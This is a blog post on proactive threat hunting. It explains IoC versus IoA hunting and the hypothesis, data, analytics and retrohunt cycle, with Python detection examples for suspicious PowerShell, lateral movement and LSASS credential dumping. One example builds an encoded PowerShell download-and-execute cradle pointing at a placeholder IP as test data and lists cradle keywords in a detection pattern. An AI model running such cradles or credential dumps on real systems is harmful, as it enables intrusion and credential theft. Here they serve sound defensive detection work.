The Hunt Is On: the Art of Threat Hunting in Modern Cybersecurity
Goodbye IoC Sweeps. Hello Operationalized Hunting.
The Missed Threats Hiding in Plain Sight
Picture this: It's 2 AM, and your security operations center is quiet, a little too quiet. The SIEM dashboards show the usual noise: a flood of low-priority alerts and a handful of suspicious logins that were dismissed as false positives earlier in the day. Unbeknownst to the team, a malicious actor has been lurking in the network for weeks, using legitimate credentials to move laterally and extract sensitive data, byte by byte. No alerts were triggered. No signatures matched.
In today's landscape where attackers evolve faster than defenses, relying solely on reactive security is a recipe for disaster. This is where threat hunting comes in, a proactive approach to identifying and neutralizing threats that evade traditional defenses before they can cause significant damage.
This week's blog is inspired by many conversations, frustrations and misconceptions about what "threat hunting" means. I hope this is informative and actionable and, as always, feedback is welcome!
What is Threat Hunting and Why Does It Matter?
Threat hunting is more than just a buzzword; it's a profession, discipline and arguably the most nuanced component of security operations. Unlike traditional detection methods that rely on alerts and known signatures, threat hunting is about actively seeking out threats that haven't yet tripped any alarms. Think of it as the difference between a home security system that alerts you when a window is broken and a guard who regularly checks for signs of tampering long before an alarm goes off.
Threat hunting is notoriously difficult and toil-filled. According to a SANS Institute survey, only 11% of organizations can complete a threat hunt in under a day; for most, the process takes days, sometimes weeks. This lag gives attackers the time they need to establish persistence, escalate privileges, and move laterally across the network.
The goal of threat hunting is simple yet powerful: reduce dwell time, the duration a threat actor remains undetected in a network. The faster threats are found, the less damage they can inflict.
The Evolution of Threat Hunting: From Indicators to Behaviors
Traditionally, threat detection has focused on Indicators of Compromise (IoCs): artifacts like file hashes, IP addresses, and URLs associated with known threats. Sophisticated attackers have long mastered the art of evasion by rotating these indicators, and ironically you don't need to be sophisticated to do it. A hex editor changes a file hash; a new proxy or hosting provider changes an IP address. Either one is enough to defeat IoC-based hunting.
This has led to a shift toward Indicators of Attack (IoAs), a term popularized by CrowdStrike that defines patterns of behavior suggesting malicious intent regardless of the specific tools or techniques used. For instance:
IoC Approach: Detecting a known malicious IP address
IoA Approach: Identifying unusual patterns of PowerShell execution, indicative of post-exploitation activities
Focusing on behaviors rather than artifacts allows hunters to detect advanced threats that blend in with legitimate traffic. This evolution is a necessary step for catching fileless malware, living-off-the-land (LotL) techniques, and the advanced persistent threats (APTs) that rely on them, all of which often go unnoticed by traditional defenses.
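To make the IoC/IoA distinction concrete, here is an added example (my own illustration, not code from the original post, from CrowdStrike, or from any detection product) that scores PowerShell process-creation events for behavior instead of matching hashes. The events, hashes, file paths and the 198.51.100.7 URL are constructed placeholders; only the Sysmon Event ID 1 field names come from a real tool. The same script, with one byte changed, slips past the hash list and is still caught by the behavioral checks.

```python
"""IoC matching versus IoA scoring on process-creation telemetry (standard library only)."""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcessCreate:
    """The Sysmon Event ID 1 fields this hunt needs."""
    image: str
    command_line: str
    parent_image: str
    sha256: str


# IoC: the hash of one script seen in a previous incident. Constructed placeholder, not a real sample.
KNOWN_BAD_HASHES = {"a1" * 32}

# IoA: parents that should almost never spawn PowerShell.
OFFICE_PARENTS = tuple("\\" + p for p in ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"))


def ioc_match(event):
    """Static indicator: does the script hash appear on the bad list?"""
    return event.sha256 in KNOWN_BAD_HASHES


def decode_encoded_command(command_line):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or None if there is none."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", command_line, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def powershell_ioas(event):
    """Behavioral indicators of post-exploitation PowerShell; the hash is never consulted."""
    if not event.image.lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
        return []
    reasons = []
    cmd = event.command_line
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command")
    # Look for cradles both in the visible command line and inside the decoded payload
    body = cmd + " " + (decoded or "")
    if re.search(r"-(?:w|win|windowstyle)\s+hidden", cmd, re.I):
        reasons.append("hidden window")
    if re.search(r"-(?:nop|noprofile)\b", cmd, re.I):
        reasons.append("no profile")
    if re.search(r"Net\.WebClient|DownloadString|Invoke-WebRequest|Invoke-Expression|\bIEX\b|FromBase64String",
                 body, re.I):
        reasons.append("download/eval cradle")
    if event.parent_image.lower().endswith(OFFICE_PARENTS):
        reasons.append("spawned by an Office application")
    return reasons


def make_sample_events():
    """Constructed events for the demo; the URL, paths and hashes are placeholders."""
    ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    word = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
    script = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"

    def enc(s):
        return base64.b64encode(s.encode("utf-16-le")).decode()

    return [
        # The exact script from the earlier incident: its hash is on the IoC list
        ProcessCreate(ps, f"powershell.exe -nop -w hidden -enc {enc(script)}", word, "a1" * 32),
        # Same script with a trailing comment: one byte changed, new hash, identical behavior
        ProcessCreate(ps, f"powershell.exe -nop -w hidden -enc {enc(script + ' #v2')}", word, "b2" * 32),
        # An administrator running a patch script from a shell: should stay quiet
        ProcessCreate(ps, r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\patch.ps1",
                      r"C:\Windows\System32\cmd.exe", "c3" * 32),
    ]


def compare(events):
    """(IoC hit?, IoA reasons) per event, so the two approaches can be read side by side."""
    return [(ioc_match(e), powershell_ioas(e)) for e in events]


if __name__ == "__main__":
    for event, (ioc, ioas) in zip(make_sample_events(), compare(make_sample_events())):
        print(f"IoC={'HIT ' if ioc else 'miss'}  IoA={ioas or 'none'}  <- {event.command_line[:60]}")
```

Run it and the first event is caught by both approaches, the second only by the behavioral checks, and the administrator's script by neither. Each "reason" is a weak signal on its own (plenty of legitimate automation uses -NoProfile), which is why the hunt scores several together rather than alerting on any one.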
The next challenge, however, is how to think about behavioral indicators rather than static ones. What should you be looking for? Where should you start?
The Key Components of a Successful Threat Hunt
Effective threat hunting is a structured process, typically based around different frameworks (we'll dig into those in a future write-up). For the sake of today's example, we'll focus on hypothesis-based threat hunting. Here's how it breaks down, it’s as easy as ABCD:
A) Hypothesis Generation: Start with a Question
Your hunt begins with a hypothesis: a question that guides the investigation.
Example: "Are there signs of credential misuse or lateral movement across our network?"
A well-defined hypothesis is essential to focus efforts and avoid the dreaded analysis paralysis: getting lost in a sea of data without a clear objective.
A note: get specific with your hypotheses. Think about the attack surface, the indicators your hypothesis would produce if it were true, and make sure the answer is provable with the data you actually collect. "Is there lateral movement?" is a theme; "Is any service account authenticating over the network to far more hosts than it did last week?" is a hypothesis you can test.
Great, we've got our hypothesis, let's get some data to test this out!
B) Data Collection: Gathering the Clues
Threat hunters rely on a diverse set of data sources:
Endpoint telemetry: Processes, registry changes, and command execution logs
Network traffic: NetFlow, DNS logs, and SSL/TLS traffic analysis
Cloud and application logs: For identifying anomalies in user access patterns
This is where many teams stumble, with too much data and too little direction. Without a targeted hypothesis, it's easy to drown in log files and SIEM alerts.
C) Behavioral Analytics: Patterns Over Indicators
Behavioral analytics uses statistical methods (and, where the data supports it, machine learning) to detect deviations from an established baseline:
Credential abuse: Using Jupyter notebooks with statistical methods to identify authentication anomalies
Data exfiltration: Applying time series analysis to detect abnormal outbound traffic patterns
Lateral movement: Implementing graph analysis to visualize and detect unusual network traversal
The key is identifying patterns that suggest an attack in progress, not just artifacts left behind. Per-entity baselines and simple statistics on top of SIEM queries get you far here; you rarely need machine learning to start.
D) Retrohunting: Leveraging Historical Data
Great, so we’ve come to a semblance of a conclusion (or at least a way to identify what is happening in near real time). Let’s talk about how to look at historical data. Retrohunting involves querying historical logs to uncover threats that went undetected. It can follow from a hunt’s conclusion (re-running the same hunt, or permutations of it, over older data), but more typically a new piece of intelligence spawns a retrospective investigation.
For example, after learning of a new exploit or technique, a threat hunter can retroactively search the last six months of logs for signs of it. This technique is invaluable for detecting advanced persistent threats (APTs) that operate in stealth for extended periods, with one caveat: a retrohunt is only as good as your log retention, so decide now which telemetry you need to keep for that long.
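Here is the ABCD cycle above as one runnable, added example (my illustration, not code from the original post or from any hunting framework). It uses only the Python standard library rather than pandas so it runs anywhere. The Event ID 4624 logon events, host names and accounts are constructed for the demo; the 7-day baseline window, the z-score threshold and the five-host floor are assumptions to tune; and the retrohunt at the end is simply the same function asked about an earlier day.

```python
"""One hypothesis-driven hunt, end to end: hypothesis -> data -> analytics -> retrohunt.
Standard library only, so it runs without pandas or a notebook."""
from collections import defaultdict
from datetime import date, datetime, timedelta
from statistics import mean, pstdev

# Hypothesis: an account being used for lateral movement authenticates over the network to far
# more distinct hosts in a day than its own recent baseline. Data: Event ID 4624 logons from the
# domain controllers, reduced to (timestamp, account, source host, destination host, logon type).
HUNT_DAY = date(2024, 3, 8)


def make_sample_logons():
    """Constructed telemetry, not real logs: a week of routine activity, then one noisy night."""
    events, day0 = [], datetime(2024, 3, 1)
    for d in range(8):
        day = day0 + timedelta(days=d)
        for dst in ("FS01", "MAIL01"):                 # alice's daily file and mail servers
            events.append((day + timedelta(hours=9), "alice", "WS01", dst, 3))
        targets = ("FS01", "FS02", "FS03") if d == 3 else ("FS01", "FS02")   # nightly backup jobs
        for dst in targets:
            events.append((day + timedelta(hours=2), "svc_backup", "BKP01", dst, 3))
    # Night 8: svc_backup suddenly reaches twelve workstations, and from alice's workstation
    night = day0 + timedelta(days=7, hours=2)
    for i in range(12):
        events.append((night + timedelta(minutes=i), "svc_backup", "WS01", f"WS{10 + i}", 3))
    return events


def distinct_destinations_per_day(events):
    """account -> {day: set of destination hosts}, counting network (type 3) logons only."""
    per_account = defaultdict(lambda: defaultdict(set))
    for ts, account, _src, dst, logon_type in events:
        if logon_type == 3:
            per_account[account][ts.date()].add(dst)
    return per_account


def hunt_fan_out(events, hunt_day, baseline_days=7, z_threshold=3.0, min_hosts=5):
    """Flag accounts whose distinct-destination count on hunt_day sits far above their own
    baseline. min_hosts keeps a jump from zero to one host from being reported as infinite."""
    findings = []
    start = hunt_day - timedelta(days=baseline_days)
    for account, days in distinct_destinations_per_day(events).items():
        baseline = [len(days.get(start + timedelta(days=i), ())) for i in range(baseline_days)]
        observed = len(days.get(hunt_day, ()))
        mu, sigma = mean(baseline), pstdev(baseline)
        if sigma == 0:                      # flat baseline: any increase is out of pattern
            z = float("inf") if observed > mu else 0.0
        else:
            z = (observed - mu) / sigma
        if observed >= min_hosts and z >= z_threshold:
            findings.append({"account": account, "observed": observed,
                             "baseline_mean": round(mu, 2), "z": round(z, 1),
                             "hosts": sorted(days[hunt_day])})
    return findings


def pivot_sources(events, account, hunt_day):
    """Graph view of one account's day: which hosts its logons came from and where they went.
    A service account logging on from a user's workstation is the pivot worth chasing."""
    edges = defaultdict(set)
    for ts, acct, src, dst, _logon_type in events:
        if acct == account and ts.date() == hunt_day:
            edges[src].add(dst)
    return {src: sorted(dsts) for src, dsts in edges.items()}


if __name__ == "__main__":
    logons = make_sample_logons()
    for f in hunt_fan_out(logons, HUNT_DAY):
        print(f"{f['account']}: {f['observed']} hosts vs baseline mean {f['baseline_mean']} (z={f['z']})")
        print("  pivots:", pivot_sources(logons, f["account"], HUNT_DAY))
    # Retrohunt: the same hypothesis asked of an older window, here three days earlier
    print("retrohunt:", hunt_fan_out(logons, HUNT_DAY.replace(day=5)))
```

On the sample data only svc_backup is flagged (14 hosts against a baseline mean of about 2), and the pivot view shows its new logons all originate from WS01, alice's workstation, which is exactly the lead an analyst would take next. Asking the same question about an earlier day returns nothing, which is what a retrohunt over clean history should look like.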
Real-World Example: Hunting for Credential Theft
Consider this real-world scenario: a security team detects an unusual spike in processes opening handles to lsass.exe on multiple endpoints (Sysmon Event ID 10, ProcessAccess), a telltale sign of credential dumping. The caveat is that some Windows components and most security products open lsass legitimately, so the hunt starts by separating known-good accessors from the rest and looking at which access rights the remaining processes requested.
Hypothesis: A threat actor is attempting to extract credentials using LSASS
Data Collection: Correlate logs showing LSASS access with authentication attempts on domain controllers
Analytical Approach: Use statistical analysis in Jupyter notebooks to separate baseline LSASS access from anomalies, then follow the exposed accounts' subsequent authentications
Outcome: Identify compromised accounts and contain the threat before lateral movement
This proactive approach is significantly more effective than waiting for a detection rule to fire. Proactivity is the difference between a contained incident and a full-blown breach.
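This is the hunt above as an added example (my illustration, not the team's actual notebook or any vendor's rule). The Sysmon Event ID 10 and Windows Event ID 4624 field names are real; the allowlist of known-good lsass accessors, the six-hour correlation window, and every host, account, path and access mask in the sample are constructed assumptions to adapt to your own environment.

```python
"""Hunting credential dumping: Sysmon Event ID 10 (ProcessAccess) on lsass.exe, correlated with
Event ID 4624 logons collected from the domain controllers. Standard library only."""
from dataclasses import dataclass
from datetime import datetime, timedelta

PROCESS_VM_READ = 0x0010   # the access right a dumper must hold to read lsass memory

# Processes that legitimately open lsass on this (hypothetical) fleet. Tune it per environment:
# too broad and it hides the attacker, too narrow and the hunt drowns in EDR and Defender noise.
KNOWN_GOOD_SOURCES = {
    r"C:\Windows\System32\csrss.exe",
    r"C:\Windows\System32\wininit.exe",
    r"C:\Program Files\Windows Defender\MsMpEng.exe",
}


@dataclass
class ProcessAccess:
    """Sysmon Event ID 10 fields used here."""
    time: datetime
    host: str
    source_image: str
    target_image: str
    granted_access: int


@dataclass
class Logon:
    """Event ID 4624 fields used here; source_host is the WorkstationName/IP the logon came from."""
    time: datetime
    account: str
    source_host: str
    target_host: str
    logon_type: int        # 2 interactive, 3 network, 10 RDP


def suspicious_lsass_access(events):
    """Keep lsass handle opens that can read memory and come from a process outside the allowlist."""
    return [e for e in events
            if e.target_image.lower().endswith("\\lsass.exe")
            and e.granted_access & PROCESS_VM_READ
            and e.source_image not in KNOWN_GOOD_SOURCES]


def hunt_lsass_dumping(access_events, logons, window=timedelta(hours=6)):
    """For each suspicious lsass access: which accounts had sessions on that host (their secrets
    were in lsass memory), and which of them then logged on *from* that host to somewhere new."""
    findings = []
    for ev in suspicious_lsass_access(access_events):
        # (account, source, target) triples seen before the window are the host's normal traffic
        baseline = {(l.account, l.source_host, l.target_host)
                    for l in logons if l.time < ev.time - window}
        exposed = {l.account for l in logons if l.target_host == ev.host and l.time <= ev.time}
        follow_on = [l for l in logons
                     if l.source_host == ev.host and l.account in exposed
                     and ev.time < l.time <= ev.time + window
                     and (l.account, l.source_host, l.target_host) not in baseline]
        findings.append({"host": ev.host, "time": ev.time, "source_image": ev.source_image,
                         "exposed_accounts": sorted(exposed),
                         "novel_logons": [(l.account, l.target_host) for l in follow_on]})
    return findings


def make_sample_data():
    """Constructed telemetry for one workstation fleet, not real logs."""
    def t(h, m):
        return datetime(2024, 3, 8, h, m)
    lsass = r"C:\Windows\system32\lsass.exe"
    access = [
        ProcessAccess(t(8, 50), "WS01", r"C:\Program Files\Windows Defender\MsMpEng.exe", lsass, 0x1010),
        ProcessAccess(t(9, 30), "WS01", r"C:\Users\alice\AppData\Local\Temp\procdump64.exe", lsass, 0x1FFFFF),
        ProcessAccess(t(9, 35), "WS02", r"C:\Windows\System32\svchost.exe", lsass, 0x1000),  # query only
    ]
    logons = [
        Logon(datetime(2024, 3, 7, 10, 0), "alice", "WS01", "FS01", 3),  # yesterday: alice's usual share
        Logon(t(8, 55), "it_admin", "JUMP01", "WS01", 10),                # admin RDPs in to troubleshoot
        Logon(t(9, 0), "alice", "WS01", "WS01", 2),                       # alice logs on at the console
        Logon(t(9, 40), "it_admin", "WS01", "DC01", 3),                   # after the dump: admin creds used from WS01
        Logon(t(9, 41), "it_admin", "WS01", "FS02", 3),
        Logon(t(10, 0), "alice", "WS01", "FS01", 3),                      # matches baseline, stays quiet
    ]
    return access, logons


if __name__ == "__main__":
    for f in hunt_lsass_dumping(*make_sample_data()):
        print(f"{f['host']} {f['time']:%H:%M} {f['source_image']}")
        print("  exposed:", f["exposed_accounts"], " novel logons:", f["novel_logons"])
```

Of the three lsass opens, Defender is allowlisted and svchost only asked for query rights, so only the procdump copy in a user's Temp folder survives. The correlation then names it_admin as the account to treat as compromised: it had an RDP session on WS01 before the dump and was used from WS01 to reach a domain controller minutes after it. alice's logon to FS01 looks identical in shape but matches her baseline, which is the difference between a finding and a false positive.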
Common Pitfalls and How to Avoid Them
Analysis Paralysis: Drowning in Data
Without a clear hypothesis, even the best threat hunters can fall prey to analysis paralysis. The fix? Start small and iterate—focus on one hypothesis at a time and expand your investigation based on findings.
Alert Fatigue: Too Many False Positives
A common complaint among SOC teams is alert fatigue: spending hours chasing false positives. High-fidelity detections that focus on behavior over signatures can reduce noise significantly and preserve analyst mental energy for actual threats.
Skill Gaps: The Automation Myth
While automation is extremely valuable, it's not a substitute for skilled threat hunters. Automation excels at repetitive tasks like data collection and initial triage, but human expertise is irreplaceable for contextual analysis and hypothesis testing. Invest in both technology and training.
The Future of Threat Hunting
With threat actors evolving their tactics daily, a proactive approach is no longer optional—it's imperative for organizational survival. By focusing on behavior-based detection, leveraging historical data through retrohunting, and integrating automation to handle repetitive tasks, organizations can shift from reactive to proactive security postures.
Where to Start:
Don't wait for the 2 AM alert that never comes. Begin your threat hunting journey today:
Start small: Develop one hypothesis based on your most critical assets
Build a baseline: Understand what "normal" looks like in your environment
Train your team: Invest in the skills needed for effective hunting
Implement the right tools: Ensure you have visibility across your entire attack surface
This is not a comprehensive framework, but it can get you started. If you’ve found other ways to begin your threat hunting journey, I’d love to hear in the comments!
Helpful Resources to Get Started
Ready to transform your security posture? Here are some valuable resources to help you begin your threat hunting journey:
Threat Hunter Playbook: a great resource by Roberto Rodriguez (aka Cyb3rward0g) that I can’t recommend enough: https://github.com/OTRF/ThreatHunter-Playbook
Python for Security: Resources for using Python in cybersecurity, including data analysis libraries like Pandas, NumPy, and SciPy for statistical analysis. Here’s a good place to start when it comes to threat hunting analytics: https://github.com/Cyb3r-Monk/RITA-J
MITRE ATT&CK Framework: Huge fan, as many of you know. attack.mitre.org
Threat Hunting Project: A collaborative, community-based project for sharing threat hunting ideas and methodologies. threathunting.net
Sigma Rules: Open-source generic signature format for SIEM systems to implement detection as code. github.com/SigmaHQ/sigma
Remember, effective threat hunting is a continuous process, not a one-time effort. Start with small, focused hunts and scale as your team gains experience and confidence.
Stay secure and stay curious, my friends!
Damien